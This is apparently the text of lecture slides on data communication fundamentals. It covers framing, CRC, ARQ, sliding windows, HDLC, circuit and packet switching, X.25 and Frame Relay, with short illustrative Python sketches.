Carried by symbols
Scripture
Voltage levels
Light pulses
Blue Whale Sonograms
What is a good information source? From a theoretical point of view a random
pattern is the best because you'll never know what comes next. On the other hand,
if you receive a continuous stream of the same symbol this would be boring. More
than boring: there is no information in it, because you can predict what comes
next! From this we conclude that a sophisticated coding, representing the
information as efficiently as possible with symbols, is a critical step in the
communication process.
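The claim that a random pattern carries the most information and a constant stream carries none can be made concrete with Shannon's entropy, H = sum of p · log2(1/p) over all symbols, measured in bits per symbol. The minimal sketch below estimates H from observed symbol frequencies. It assumes a memoryless source, so it ignores symbol order (a repeating pattern such as ABCDABCD would still score 2 bits per symbol although it is predictable); the function name `entropy_bits` is illustrative.

```python
import math
from collections import Counter

def entropy_bits(symbols):
    """Estimate entropy in bits per symbol from symbol frequencies (memoryless model)."""
    counts = Counter(symbols)
    n = len(symbols)
    # H = sum(p * log2(1/p)); a symbol with p = 1 contributes exactly 0
    return sum((c / n) * math.log2(n / c) for c in counts.values())

print(entropy_bits("AAAAAAAA"))  # 0.0: a constant stream is fully predictable
print(entropy_bits("ADBCCABD"))  # 2.0: four equally frequent symbols
```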
Throughout these chapters we will mainly deal with symbols such as voltage
levels or light pulses.
Look at the Blue Whale Sonograms. The x-axis represents time, the y-axis
frequency, and the color represents power density. This communication pattern is
very complex (that of dolphins is even more complex). It is known that each
herd has its own traditional hymn. And: they like to communicate!
5 {C} Herbert Haas 2010/02/15
Symbols on Wire
Discrete voltage levels = "Digital"
Binary (easiest)
No clocking wire
Example: AWGN-channel
C = B · log2(1 + S/N)
The great information theory guru Claude E. Shannon made a great discovery in
1948. Before 1948, it was commonly assumed that there is no way to guarantee
error-free transmission over a noisy channel. However, Shannon showed that
transmission with an arbitrarily small error probability is possible as long as the
information rate stays below the so-called channel capacity, which depends on
bandwidth and signal-to-noise ratio.
This discovery is regarded as one of the most important achievements in
communication theory.
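The capacity formula C = B · log2(1 + S/N) can be evaluated directly. In this sketch the 3100 Hz bandwidth and the 30 dB signal-to-noise ratio are assumed example values (roughly an analog telephone channel), and the helper names are hypothetical.

```python
import math

def shannon_capacity_bps(bandwidth_hz, snr_linear):
    """Capacity C = B * log2(1 + S/N) of an AWGN channel, in bit/s."""
    return bandwidth_hz * math.log2(1 + snr_linear)

def db_to_linear(snr_db):
    """Convert a signal-to-noise ratio from dB to a linear power ratio."""
    return 10 ** (snr_db / 10)

# Assumed example: 3100 Hz channel with 30 dB SNR (S/N = 1000)
c = shannon_capacity_bps(3100, db_to_linear(30))
print(f"{c / 1000:.1f} kbit/s")  # 30.9 kbit/s
```

Below this rate, suitable coding can make the error probability as small as desired; above it, no code can.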
Bitrate vs Baud
Ensure interoperability
Created by a standardization
organization
Operating system
Programming Language
Practically, the OSI model
Organizes knowledge
LAN: 802.2
CLNP
IP, IPX
Q.931, X.25
Application Layer
Presentation Layer
Session Layer
Transport Layer
Network Layer
Data Link Layer
Physical Layer
The network layer builds the so-called "packet". Layer 3 transports the packets
between the different networks. Therefore layer 3 needs structured and routable
addresses to find the right networks. IP is the most important layer 3 protocol
today (IPv4 has a structured 4-byte address). The OSI Connectionless Network
Protocol (CLNP) is another example of a layer 3 protocol, but it is not widely
used today, except that some telcos and carriers use it for internal
purposes. IPX was developed by Novell in order to extend Novell
networks over different data link layer worlds. Q.931 is the ISDN layer 3
protocol carried over the D-channel and is used for signaling purposes. Basically, Q.931
conveys the telephone numbers and other service parameters. The classical
packet-switched WAN standard X.25 actually specifies only layer 3 of this
technology and is used to set up a number of virtual calls over a synchronous
link layer (LAPB).
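To illustrate what a structured 4-byte IPv4 address means, Python's standard `ipaddress` module can split an address into a network part (used by routers to find the right network) and a host part. The address 192.168.10.5 and the /24 prefix are arbitrary examples.

```python
import ipaddress

# Arbitrary example: host 192.168.10.5 inside a /24 network
iface = ipaddress.ip_interface("192.168.10.5/24")

print(len(iface.ip.packed))  # 4: an IPv4 address is 4 bytes long
print(iface.network)         # 192.168.10.0/24: the routable network part
print(int(iface.ip) & int(iface.network.hostmask))  # 5: the host part
```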
17 {C} Herbert Haas 2009/08/12
Transport Layer
Reliable transport of
segments between
applications
Application multiplexing
through T-SAPs
Sequence numbers and
Flow control
Optional QoS Capabilities
Examples:
TCP (UDP)
Synchronization Points
Little capabilities, usually
not implemented or part of
application layer
A set of entities
Interface
Part of IDU
Part of IDU
Data
Typically a 0101010...-pattern
bit-patterns or code-violations
Byte-Stuffing
Bit-Stuffing
[Figure: frames delimited by Preamble, Start Delimiter (SD) and End Delimiter (ED), carrying Control, DATA and FCS fields]
If a special bit pattern is used to indicate the start and end of a
frame, it is necessary to prevent this pattern from appearing inside the data portion
of the frame. Otherwise the frame would be misinterpreted.
There are two principal methods to achieve this goal: either modifying single
bits of the data stream (bit-stuffing) or replacing whole bytes (byte-stuffing).
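A minimal sketch of bit-stuffing, assuming the HDLC convention: the flag is 01111110, so the sender inserts a 0 after every five consecutive 1s in the data, and the receiver removes it again. Bits are modelled as Python lists of 0 and 1 for readability; real implementations do this in hardware on the serial bit stream.

```python
def bit_stuff(bits):
    """Insert a 0 after every run of five 1s so the flag 01111110 cannot occur in the data."""
    out, ones = [], 0
    for b in bits:
        out.append(b)
        ones = ones + 1 if b == 1 else 0
        if ones == 5:
            out.append(0)  # stuffed bit
            ones = 0
    return out

def bit_unstuff(bits):
    """Remove the 0 that follows every run of five 1s."""
    out, ones, skip = [], 0, False
    for b in bits:
        if skip:           # this is the stuffed 0: drop it
            skip, ones = False, 0
            continue
        out.append(b)
        ones = ones + 1 if b == 1 else 0
        if ones == 5:
            skip = True
    return out

print(bit_stuff([0, 1, 1, 1, 1, 1, 1, 0]))  # [0, 1, 1, 1, 1, 1, 0, 1, 0]
```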
7 {C} Herbert Haas 2005/03/11
Byte Stuffing
Some character-oriented protocols
divide data stream into frames
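As a sketch of byte-stuffing, the code below borrows the escaping rule of PPP in HDLC-like framing (RFC 1662): a flag byte 0x7E or escape byte 0x7D inside the payload is replaced by 0x7D followed by the original byte XOR 0x20. Other character-oriented protocols use different special characters, and the control-character escaping of PPP is omitted here; both choices are simplifying assumptions.

```python
FLAG = 0x7E  # frame delimiter
ESC = 0x7D   # escape byte

def byte_stuff(payload: bytes) -> bytes:
    """Replace every FLAG or ESC byte in the payload by ESC, byte XOR 0x20."""
    out = bytearray()
    for b in payload:
        if b in (FLAG, ESC):
            out += bytes([ESC, b ^ 0x20])
        else:
            out.append(b)
    return bytes(out)

def byte_unstuff(data: bytes) -> bytes:
    """Undo byte_stuff on the bytes between two flags."""
    out = bytearray()
    escaped = False
    for b in data:
        if escaped:
            out.append(b ^ 0x20)
            escaped = False
        elif b == ESC:
            escaped = True
        else:
            out.append(b)
    return bytes(out)

def frame(payload: bytes) -> bytes:
    """Delimit the stuffed payload with flags; the flag can no longer occur inside."""
    return bytes([FLAG]) + byte_stuff(payload) + bytes([FLAG])

print(byte_stuff(b"\x01\x7e\x7d").hex())  # 017d5e7d5d
```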
CRC-16: x^16 + x^15 + x^2 + 1
CRC-CCITT: x^16 + x^12 + x^5 + 1
Checksums which are built on the basis of the XOR operation do not provide
reliable detection of error bursts.
Therefore the Cyclic Redundancy Check is based on polynomial division, and it is
capable of detecting even bursts of erroneous bits inside the data stream.
A single set of check bits is computed from a generator polynomial for each
transmitted frame and appended to the tail of the frame by the sender. The
receiver then performs the same computation on the complete frame and
compares the received checksum with its own calculated checksum.
There are many different standardized polynomials, such as CRC-16,
CRC-32 or CRC-CCITT.
The CRC-16 check, for example, detects all error bursts of up to 16 bits
and most error bursts longer than 16 bits. CRC-16 and CRC-CCITT
are mainly used in WAN technologies, while CRC-32 is mainly used in
LAN environments.
It is quite simple to implement these CRC checks in hardware using
16- or 32-bit shift registers.
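The bit-serial loop below mimics a 16-bit shift register for the CRC-CCITT polynomial x^16 + x^12 + x^5 + 1 (0x1021). It is a sketch of the non-reflected variant with initial value 0xFFFF (often catalogued as CRC-16/CCITT-FALSE); the HDLC/X.25 FCS uses the same polynomial but processes bits in reflected order and inverts the result, so its values differ.

```python
def crc16_ccitt(data: bytes, crc: int = 0xFFFF) -> int:
    """Bitwise CRC with generator 0x1021, each byte processed MSB first."""
    for byte in data:
        crc ^= byte << 8                  # feed the next byte into the register
        for _ in range(8):
            if crc & 0x8000:              # top bit set: shift and XOR (subtract) the generator
                crc = ((crc << 1) ^ 0x1021) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc

frame = b"123456789"
fcs = crc16_ccitt(frame)
print(hex(fcs))                           # 0x29b1, the usual check value for this variant

# Receiver side: recompute and compare; a single flipped bit changes the result
corrupted = bytes([frame[0] ^ 0x01]) + frame[1:]
print(crc16_ccitt(corrupted) == fcs)      # False
```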
Forward Error Correction
Required for "extreme" conditions
Addressing
Sequence numbers
Acknowledgement Flag
Frame Type
Signalling information
The content of the control field depends on the tasks that need to be
performed by the data link protocol.
So the control field could contain:
Address information for addressing, especially in point-to-multipoint
environments
Sequence numbers that can be seen as serial numbers for each single frame
Acknowledgement flags to indicate that the data was received properly
Frame type information to indicate whether it's a frame that carries data or
control information
Service Access Point (SAP) or payload type information to indicate what is
transported by the frame
Signaling information, in case of connection-oriented protocols, to set up a
connection
Connection-Oriented Protocols
Different definitions
Connection establishment
Disconnect
Keepalive
ARQ possible (Error Recovery)
Obviously it takes some time to establish a connection before the data is
allowed to flow. But the establishment delay is typically in the range of
milliseconds. Even ISDN establishes a connection worldwide in
less than one second.
A traffic descriptor may optionally be used for all technologies that support
Quality of Service features. The traffic descriptor holds the information about
the service parameters, e.g. delay, burst size etc., that should be used for this
connection.
There are also separate frame types defined for connection establishment,
disconnect procedures and keepalives.
The use of Automatic Repeat Requests (ARQ) is optional, depending on the
technology used. The purpose of ARQ is to provide error recovery in case
of transmission failures.
Automatic Repeat Request
ARQ protocols guarantee correct
delivery of data
Retransmission Timers
Retransmission Buffers
TCP
Variant known as "fast retransmit"
Uses duplicate acks as NACK
The Go-Back-N procedure is used by the quite old HDLC protocol because
reordering data packets was too time- and memory-consuming a task
for processors in the early days of data communication.
Today's TCP implementations also use a variant of the NACK procedure:
the duplicate ACK. As soon as a TCP stack recognizes that a data segment is
missing, it sends out a duplicate acknowledgement. When the sender receives
several duplicate ACKs (typically three), it recognizes that a segment was lost
and retransmits it. This speeds up the error recovery procedure because the
sender does not have to wait for the retransmission timeout.
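The duplicate-ACK mechanism can be sketched as a counter on the sender side. Following TCP's fast retransmit (RFC 5681), the sketch retransmits after three duplicate ACKs; for readability it numbers segments rather than bytes, and the function name is hypothetical.

```python
def fast_retransmit_events(acks, dup_threshold=3):
    """Return the segments a sender would retransmit before any timer expires.

    Each ACK carries the number of the next segment the receiver expects
    (cumulative acknowledgement), so a repeated value names the missing segment.
    """
    retransmitted = []
    last_ack, dup_count = None, 0
    for ack in acks:
        if ack == last_ack:
            dup_count += 1
            if dup_count == dup_threshold:
                retransmitted.append(ack)
        else:
            last_ack, dup_count = ack, 0
    return retransmitted

# Segments 0, 1 and 2 arrive, 3 is lost; segments 4, 5 and 6 each trigger another "ACK 3"
print(fast_retransmit_events([1, 2, 3, 3, 3, 3]))  # [3]
```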
Selective Reject ARQ
Modern modification of Go-Back-N
Only those frames are retransmitted
that receive a NACK
Early TCP
The positive ACK procedure is always used together with cumulative
acknowledgements. Frames may arrive out of order, and this must
be fixed by the receiver. Only timeouts trigger retransmissions of lost data frames.
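The difference between Go-Back-N and Selective Reject shows up at the receiver: a Go-Back-N receiver discards every frame that arrives after a gap, so the sender must resend all of them, while a Selective Reject receiver buffers them and only the missing frame is resent. A minimal sketch; the function name and the scheme strings are illustrative.

```python
def receive(arrivals, scheme):
    """Return (delivered, discarded) frame numbers for an in-order receiver.

    scheme "go-back-n": out-of-order frames are discarded.
    scheme "selective-reject": out-of-order frames are buffered until the gap is filled.
    """
    expected = 0
    buffered = set()
    delivered, discarded = [], []
    for seq in arrivals:
        if seq == expected:
            delivered.append(seq)
            expected += 1
            while expected in buffered:       # only ever non-empty for selective reject
                buffered.remove(expected)
                delivered.append(expected)
                expected += 1
        elif seq > expected and scheme == "selective-reject":
            buffered.add(seq)
        else:
            discarded.append(seq)             # duplicate, or out of order under go-back-n
    return delivered, discarded

# Frame 2 is lost once: Go-Back-N must resend 2, 3 and 4; Selective Reject resends only 2
print(receive([0, 1, 3, 4, 2, 3, 4], "go-back-n"))   # ([0, 1, 2, 3, 4], [3, 4])
print(receive([0, 1, 3, 4, 2], "selective-reject"))  # ([0, 1, 2, 3, 4], [])
```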
Windowing
As shown, the sender must buffer
unacknowledged frames in case of
retransmissions
Necessary sender-buffer size is
called "window"
Window size depends on
Bandwidth of channel
Round-Trip-Time (RTT)
The sender needs to buffer all transmitted frames until the corresponding
acknowledgement arrives. The size of this transmit buffer is called the window
size.
The optimum window size directly depends on the bandwidth of the channel as
well as on the Round-Trip-Time.
Older protocols use a fixed window size negotiated during connection setup.
More modern protocols such as TCP use a method called adaptive windowing,
which automatically adapts the window size to the needs of the transport
system.
Remember: Full Pipe!
[Figure: Vienna to Tokyo link at 1.5 Mbit/s carrying 1 KB data frames and Acks; time marks t = 0 s and t = 350 ms]
This situation
corresponds to a
sliding window
In this scenario a proper window size is used, which guarantees the most efficient
use of the transport capacity.
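How large must the window be to keep the pipe full? It is the bandwidth-delay product, BW × RTT. The sketch below uses the numbers from the Vienna to Tokyo figure, assuming that the 350 ms mark is the round-trip time and that 1 KB means 1024 bytes; the helper names are hypothetical.

```python
import math

def window_bytes(bandwidth_bps, rtt_ms):
    """Bytes that must be in flight to keep the pipe full: bandwidth x RTT."""
    return bandwidth_bps * rtt_ms / 8000  # (bit/s * ms) / (8 bit/byte * 1000 ms/s)

def window_frames(bandwidth_bps, rtt_ms, frame_bytes):
    """The same window expressed in whole frames (rounded up)."""
    return math.ceil(window_bytes(bandwidth_bps, rtt_ms) / frame_bytes)

print(window_bytes(1_500_000, 350))         # 65625.0
print(window_frames(1_500_000, 350, 1024))  # 65
```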
Sliding Window Basics (1)
[Figure: frames 1 to 16 in three snapshots with a window of four frames; labels: frames to be sent, frames in flight, already sent and acknowledged; Ack = 3 and Ack = 7]
In this example a fixed window size of four is used. This means that up to four
data frames may be sent without explicit acknowledgments.
As soon as the first ACK 3 arrives, the sliding window moves to the left. This
is possible because data frames 1 and 2 are now removed from the send
buffer. Now data frames 5 and 6 are sent and kept in the send buffer until
their acknowledgements arrive.
On the left side of the window we find the data frames that will be sent in the
future, while on the right side of the sliding window the already sent and
acknowledged frames can be found. So the window moves continuously from
right to left, hence the name sliding window.
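The example can be replayed with a small sender model. It assumes, as in the figure, that "Ack = n" acknowledges every frame below n (so Ack = 3 frees frames 1 and 2); the class name is hypothetical, and frame numbers simply grow instead of wrapping around.

```python
class SlidingWindowSender:
    """Fixed-size sending window; ACK n confirms every frame numbered below n."""

    def __init__(self, window_size, first_frame=1):
        self.window_size = window_size
        self.base = first_frame        # oldest unacknowledged frame (edge of the window)
        self.next_frame = first_frame  # next frame that has not been sent yet

    def send_allowed(self):
        """Send every frame that currently fits into the window."""
        sent = []
        while self.next_frame < self.base + self.window_size:
            sent.append(self.next_frame)  # kept in the send buffer until acknowledged
            self.next_frame += 1
        return sent

    def on_ack(self, ack):
        """Slide the window: frames below `ack` leave the send buffer."""
        if ack > self.base:
            self.base = ack
        return self.send_allowed()

sender = SlidingWindowSender(window_size=4)
print(sender.send_allowed())  # [1, 2, 3, 4]
print(sender.on_ack(3))       # [5, 6]
print(sender.on_ack(7))       # [7, 8, 9, 10]
```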
Sliding Window Basics (2)
Window Size in Bytes = BW × RTT
At least W+1 identifiers
If all W frames must be retransmitted,
receiver must distinguish them from new data
W ≤ (MaxSeqNum+1)/2
To avoid troubles on wrap-around
Assume we have a window size W = 4 and the same number of identifiers
(sequence numbers 0..3). When we send four frames at once and unfortunately
all corresponding acknowledgements get lost, our timers expire and we must
retransmit those frames. Now we again send frames 0..3 but the receiver cannot
recognize them as the second incarnation. Thus, the first really new frame must
have a sequence number of 4, that is, the next frames have identifiers 4, 0, 1, 2.
The result is that we need at least W+1 identifiers.
Even then, another tricky scenario might happen. Assume we have a sequence
number space 0..7 (8 identifiers) and W = 7. We send frames 0,1,2,3,4,5,6 and
get all acknowledgements. Then we send 7, 0, 1, 2, 3, 4, 5. How can the
receiver be sure that frames 0,1,2,3,4,5 are not retransmitted frames? (Frame 7
might get lost!)
Because of this, we use a smaller window size W = 4. Now we send frames
0,1,2,3 and get all acknowledgements. Then we send 4,5,6,7. The receiver is
not confused.
So the final rule requires W to be at most half the number of identifiers.
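Both scenarios can be checked mechanically. After frames 0..W-1 were sent, the receiver accepts the next `receiver_window` sequence numbers; if all ACKs were lost, the sender repeats the old W numbers instead. Any overlap (modulo the number of identifiers) makes the retransmissions indistinguishable from new data. A receiver window of 1 models the first scenario (only the next in-order frame is accepted), a receiver window of W the second. The function name is illustrative.

```python
def ambiguous(window, seq_space, receiver_window):
    """True if retransmitted frames could be mistaken for new ones."""
    old = {i % seq_space for i in range(window)}                      # possible retransmissions
    new = {(window + i) % seq_space for i in range(receiver_window)}  # numbers the receiver accepts
    return bool(old & new)

print(ambiguous(4, 4, 1))  # True: only W identifiers
print(ambiguous(4, 5, 1))  # False: W+1 identifiers suffice for an in-order receiver
print(ambiguous(7, 8, 7))  # True: the W = 7 case with 8 identifiers
print(ambiguous(4, 8, 4))  # False: W is half the number of identifiers
```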
Jumping Window
Vienna Tokyo
In this example we see what happens if the window size is too small.
The sender in Vienna has sent out all data frames until it reached the maximum
window size. Now the sender in Vienna has to wait for acknowledgments to
arrive.
The incoming acknowledgements free up buffer space and the sender may
continue to send. In this scenario the chosen window size is obviously too small,
leading to insufficient use of the transport capacity.
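Why a small window wastes capacity: at most one window can be delivered per round trip, so throughput is roughly min(line rate, window / RTT). The sketch reuses the 1.5 Mbit/s and 350 ms values of the Vienna to Tokyo example (350 ms assumed to be the RTT); the 16 KB window is a hypothetical "too small" value.

```python
def throughput_bps(window_bytes, rtt_ms, bandwidth_bps):
    """At most one window per round trip, capped by the line rate."""
    return min(bandwidth_bps, window_bytes * 8000 / rtt_ms)

print(throughput_bps(65625, 350, 1_500_000))  # 1500000: the window fills the pipe
print(throughput_bps(16384, 350, 1_500_000))  # about 374 kbit/s: window too small
```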
Jumping Window
Vienna Tokyo
Evidently, this specific situation depicted above can only occur when the
sender employs a dynamic window size (assume the sender started with W = 20
and suddenly reduced the window size to W = 4).
Flow Control
Too large window sizes
TCP's approach
Stop and Go
Collisions possible
Connection-oriented or connectionless
Framing
Frame Protection
Mother of many LAN and WAN protocols
Half-Duplex Management
[Figure: two modem pairs with RTS, CTS and DCD signals; frames labelled P=0 DATA, P=1 DATA, F=0 DATA and F=1 DATA]
Same on Multipoint Lines (1)
[Figure: primary station and secondary stations C1 to C4; frames labelled P=0, A=C2 DATA and P=1, A=C2 DATA]
Same on Multipoint Lines (2)
[Figure: primary station and secondary stations C1 to C4; frames labelled A=C2, F=0 DATA and A=C2, F=1 DATA]
Early HDLC Example
[Figure: mainframe with FEP attached via ESCON and IBM channel; HDLC lines at 9600..19200 bit/s run over modems (M), DCEs and MSDs to cluster controllers CC1 and CC2 (DTEs), which serve terminals and Token Ring networks]
HDLC Basics (1)
Synchronous Transmission
Bit-oriented (Bit-Stuffing)
Developed by ISO
Supports
Framing
Frame protection
Error recovery
Building Blocks
Primary Station
Secondary Station
Combined Station
Three modes
NRM
ARM
ABM
Window sizes
Extensions, etc...
ARQ (1)
"Checkpointing"
What is Cisco-HDLC ?
Most important
Statistically dimensioned
Frames can have different size
Multiplexers require buffers
Variable delays
Address information required
Not protocol transparent
Statistical TDM allows good utilization of the trunk because no bandwidth is
wasted on idle patterns and the capacity is determined by the
average needs of the users.
The frame size may vary depending on the needs of the users.
Buffering is required under trunk overload conditions.
The delay is variable because of buffering.
Address information is needed because the correlation between time-slot
position and destination is lost.
Statistical TDM is not protocol transparent because separate framing as well as
addresses are needed.
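A statistical multiplexer can be sketched as a first-come, first-served buffer in front of one trunk. The sketch shows three of the properties listed above: frames carry an address because their position on the trunk no longer identifies the user, frames wait in a buffer while the trunk is busy, and therefore the delay varies. Time is counted in abstract ticks, and all input values are hypothetical.

```python
def stat_mux(arrivals, trunk_bytes_per_tick):
    """Serve frames first-come, first-served over one trunk.

    arrivals: list of (arrival_tick, user_address, size_bytes), sorted by time.
    Returns (user_address, delay_ticks) for each frame, including transmission time.
    """
    trunk_free_at = 0.0
    result = []
    for arrival, user, size in arrivals:
        start = max(trunk_free_at, arrival)  # wait in the buffer while the trunk is busy
        trunk_free_at = start + size / trunk_bytes_per_tick
        result.append((user, trunk_free_at - arrival))
    return result

print(stat_mux([(0, "A", 100), (0, "B", 100), (5, "C", 50)], 100))
# [('A', 1.0), ('B', 2.0), ('C', 0.5)]
```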
Networking: Fully Meshed
User A
User B
User C
User D
User F
User E
Metcalfe's Law:
n(n-1)/2 links
Good fault
tolerance
Expensive
A fully meshed network is something everybody wants, because it gives 100%
redundancy and optimized data transport to each destination. But unfortunately
only very few can afford it, because the costs of the network infrastructure
grow according to Metcalfe's law,
which is expressed by the formula n × (n-1)/2. This means that if you have ten sites
you want to connect in an any-to-any topology, you need 45 connections.
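The link counts can be checked quickly. The star count assumes a single central switch to which every site connects once, as in the six-user switching example; the function names are illustrative.

```python
def full_mesh_links(n):
    """Point-to-point links needed to connect n sites any-to-any."""
    return n * (n - 1) // 2

def star_links(n):
    """Links needed when every site connects once to a central switch."""
    return n

for sites in (6, 10):
    print(sites, full_mesh_links(sites), star_links(sites))
# 6 15 6
# 10 45 10
```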
Networking: Switching
User A
User B
User C
User D
User F
User E
Only 6 links
Switch supports
either
deterministic or
statistical TDM
One way to save costs is the use of network switches, which are
responsible for handling the traffic between the different destinations.
The switches may use a technology based either on deterministic or statistical
TDM. In this case we need only six links instead of fifteen to
establish communication between all sites.
Circuit Switching
[Figure: users A2 and B5 connected through a network of four switches with trunks TA, T1, T2, T3, T4 and TB]
Switching table entries, incoming trunk(timeslot) -> outgoing trunk(timeslot):
TA(1) -> T1(4) : A1-C9
TA(2) -> T2(7) : A2-B5
TA(3) -> T2(6) : A3-D1
T2(6) -> T4(1)
T2(7) -> T3(18)
T3(18) -> T4(5)
T3(19) -> T1(1)
T4(4) -> TB(9)
T4(5) -> TB(5)
Path of the connection A2-B5:
TA(2) -> T2(7) -> T3(18) -> T4(5) -> TB(5)
Circuit switching technology is based on deterministic TDM.
All network switches in circuit switching technology hold a switching table which
determines the correlation between incoming trunk/timeslot and outgoing
trunk/timeslot.
In our example the connection between users A2 and B5 is established by four
network switches and their corresponding switching tables. For both users this
connection looks like a dedicated point-to-point link; they are not aware of what's
going on inside the network cloud.
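The switching tables of the example can be replayed in a few lines. Each entry maps an incoming (trunk, timeslot) to an outgoing (trunk, timeslot), copied from the figure. Merging the four per-switch tables into one dictionary is a simplification that works here only because no incoming trunk/timeslot pair appears twice.

```python
# (incoming trunk, timeslot) -> (outgoing trunk, timeslot), entries from the figure
SWITCHING = {
    ("TA", 1): ("T1", 4), ("TA", 2): ("T2", 7), ("TA", 3): ("T2", 6),
    ("T2", 6): ("T4", 1), ("T2", 7): ("T3", 18),
    ("T3", 18): ("T4", 5), ("T3", 19): ("T1", 1),
    ("T4", 4): ("TB", 9), ("T4", 5): ("TB", 5),
}

def trace(entry, table=SWITCHING):
    """Follow a circuit hop by hop until no switching entry matches."""
    path = [entry]
    while path[-1] in table:
        path.append(table[path[-1]])
    return path

print(trace(("TA", 2)))
# [('TA', 2), ('T2', 7), ('T3', 18), ('T4', 5), ('TB', 5)]
```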
Circuit Switching - Facts
Based on deterministic TDM
Minimal delay
Protocol transparent
Connectionless
Routing Table
Local addresses
Connection-oriented
Switching Table
There are two major technologies that make use of the statistical TDM principle.
The datagram principle uses globally unique and routable addresses.
Forwarding decisions are made using statically or dynamically generated
routing tables, and the data transport is connectionless. Examples of the
datagram principle are IP, IPX, AppleTalk, etc.
The virtual call principle uses locally significant addresses, well known under the
term virtual circuit identifier. The data transport is connection-oriented and
the forwarding decisions are made using switching tables. The switching tables hold
the information about incoming trunk/circuit identifier and the corresponding
outgoing trunk/circuit identifier. Examples of virtual call services are X.25,
Frame Relay, ATM, etc.
Datagram
[Figure: user A.2 sends datagrams (source A2, destination B5) through routers R1, R2, R4 and R5 to user B.5; router R3 is also part of the network]
Routing tables (destination: next hop):
R1: A local, B R2, C R2, ...
R2: A R1, B R4, C R3, ...
R4: A R2, B R5, C R2, ...
R5: A R4, B local, C R4, ...
In the datagram technology, user A.2 sends out data packets destined for user
B.5. Each single datagram holds the information about sender and receiver
address.
The datagram forwarding devices, in our example routers, hold a routing table in
memory. In the routing table we find a correlation between the destination address
of a data packet and the corresponding outgoing interface as well as the next-hop
router. So data packets are forwarded through the network on a hop-by-hop basis.
The routing tables can be set up either by manual configuration by the
administrator or with the help of dynamic routing protocols like RIP, OSPF, IS-IS,
etc. The use of dynamic routing protocols may lead to rerouting decisions in case
of network failure, and so packet overtaking may happen in these systems.
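Hop-by-hop forwarding can be sketched with the routing tables of the example. Assigning each table to R1, R2, R4 and R5 follows from the next-hop entries; R3's table is not shown in the figure, so it is left out. Treating the first character of an address as its network part is an assumption for illustration.

```python
ROUTING_TABLES = {
    "R1": {"A": "local", "B": "R2", "C": "R2"},
    "R2": {"A": "R1", "B": "R4", "C": "R3"},
    "R4": {"A": "R2", "B": "R5", "C": "R2"},
    "R5": {"A": "R4", "B": "local", "C": "R4"},
}

def forward(first_router, destination, max_hops=16):
    """Return the routers a datagram visits; each hop decides independently."""
    network = destination[0]          # assumption: first character is the network part
    path = [first_router]
    while ROUTING_TABLES[path[-1]][network] != "local":
        if len(path) > max_hops:      # TTL-like guard against routing loops
            raise RuntimeError("hop limit exceeded")
        path.append(ROUTING_TABLES[path[-1]][network])
    return path

print(forward("R1", "B5"))  # ['R1', 'R2', 'R4', 'R5']
print(forward("R5", "A2"))  # ['R5', 'R4', 'R2', 'R1']
```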
Datagram - Facts (1)
Addresses contain topological information
Static (manually)
Sequence is guaranteed
LCN (X.25)
VPI/VCI (ATM)
All WAN switching technologies utilize the same principle that has been
described above, but the connection identifier has different names. In X.25 we call
it the Logical Channel Number (LCN). With Frame Relay we talk about the Data
Link Connection Identifier (DLCI). And ATM cells are switched using the
Virtual Path Identifier/Virtual Channel Identifier (VPI/VCI). No matter what
complicated names are used, it is simply a dumb identifier without any special
meaning.
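Because the identifier is only locally significant, each switch may rewrite it (label swapping) on the way. The switch names, ports and identifier values below are hypothetical; they stand in for LCNs, DLCIs or VPI/VCI pairs alike.

```python
# Hypothetical tables: (input port, incoming identifier) -> (output port, outgoing identifier)
SWITCH_TABLES = {
    "S1": {(1, 16): (3, 42)},
    "S2": {(2, 42): (4, 17)},
    "S3": {(1, 17): (2, 99)},
}
# Hypothetical wiring: (switch, output port) -> (next switch, its input port)
LINKS = {("S1", 3): ("S2", 2), ("S2", 4): ("S3", 1)}

def follow_circuit(switch, in_port, ident):
    """Return (switch, incoming id, outgoing id) for every hop of one virtual circuit."""
    hops = []
    while switch is not None:
        out_port, out_ident = SWITCH_TABLES[switch][(in_port, ident)]
        hops.append((switch, ident, out_ident))  # the identifier is swapped at each hop
        switch, in_port = LINKS.get((switch, out_port), (None, None))
        ident = out_ident
    return hops

print(follow_circuit("S1", 1, 16))
# [('S1', 16, 42), ('S2', 42, 17), ('S3', 17, 99)]
```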
Example
BANG
This example shows what happens if a node in the center of a network
collapses. All connections through the collapsed node are torn down and new
connections need to be established using signaling. This causes a lot of overhead
due to the new connection setup requests. In virtual call service technology it's
up to the end devices to set up a new connection through the network.
In datagram technology this problem would be fixed by the network itself through
rerouting.
Two Service Types
Switched Virtual Circuit (SVC)
Example: Datex-P
Adopted and extended by ISO
Identifies connection
Flow control
Window size
Transit delay
The X.25 standard describes a number of so-called "facilities" that identify or
enhance an X.25 session. There are two types of facilities: essential and
optional.
X.25 supports various packet sizes up to 4 KB. The maximum data rate defined
for X.25 is 2 Mbit/s.
X.25 Facilities (2)
Optional Facilities
Reverse charging
Hunt groups
Call redirection
Negotiation of optional facilities can be done in advance between user and
service provider, by online registration or during call setup.
REJ support means optional ARQ on layer 3. This service utilizes the so-called
"D-bit" explained later. Fast Select allows data to be sent immediately with the
first packet that is sent for connection establishment. This feature was invented
especially for credit-card transactions to speed up this payment method. Closed
user groups guarantee privacy so that only dedicated users can communicate,
which is very important for commercial networks. Reverse charging is one of the
unpleasant facilities. DTEs can be collected into a so-called hunt group to
improve accessibility. If an incoming call occurs, each DTE within a hunt
group is alerted, following a predefined order. Call redirection is a comfortable
feature that lets others do your job.
Fragmentation (1)
Switch may fragment packets
Buffering
Quality of Service
Congestion control
The most important difference to X.25 is the lack of error recovery and flow
control. Note that X.25 performs error recovery and flow control on each link
(unlike TCP, for example). Obviously this extremely reliable service suffers
from delays. But Frame Relay is an ISDN application and ISDN provides
reliable physical links, so why use ARQ techniques on lower layers at all?
The second important difference is that X.25 sends virtual circuit service
packets and data packets in the same virtual circuit. This is called "in-band
signaling". Frame Relay establishes a dedicated virtual circuit for signaling
purposes only.
Thirdly, Frame Relay can deal with traffic parameters such as "Committed
Information Rate" (CIR) and "Excess Information Rate" (EIR). That is, the
Frame Relay provider guarantees the delivery of data packets below the CIR
and offers at least a best-effort service for higher data rates. We will discuss
this later in much greater detail.
And finally, although Frame Relay does not retransmit dropped frames, the
network at least responds with congestion indication messages to choke the
user's traffic.
Basically, Frame Relay can be viewed as a streamlined version of X.25,
especially tuned to achieve low delays.
History of Frame Relay
First proposals 1984 by CCITT
Slow progress
1990: Cisco, Northern Telecom, StrataCom,
and DEC founded the Gang of Four (GoF)
Identifies connection
Specified in Q.922
Q.922 consists of
Based on Q.921
T1.618 is based on a subset of
T1.602 called the "core aspects"
ITU-T X.21
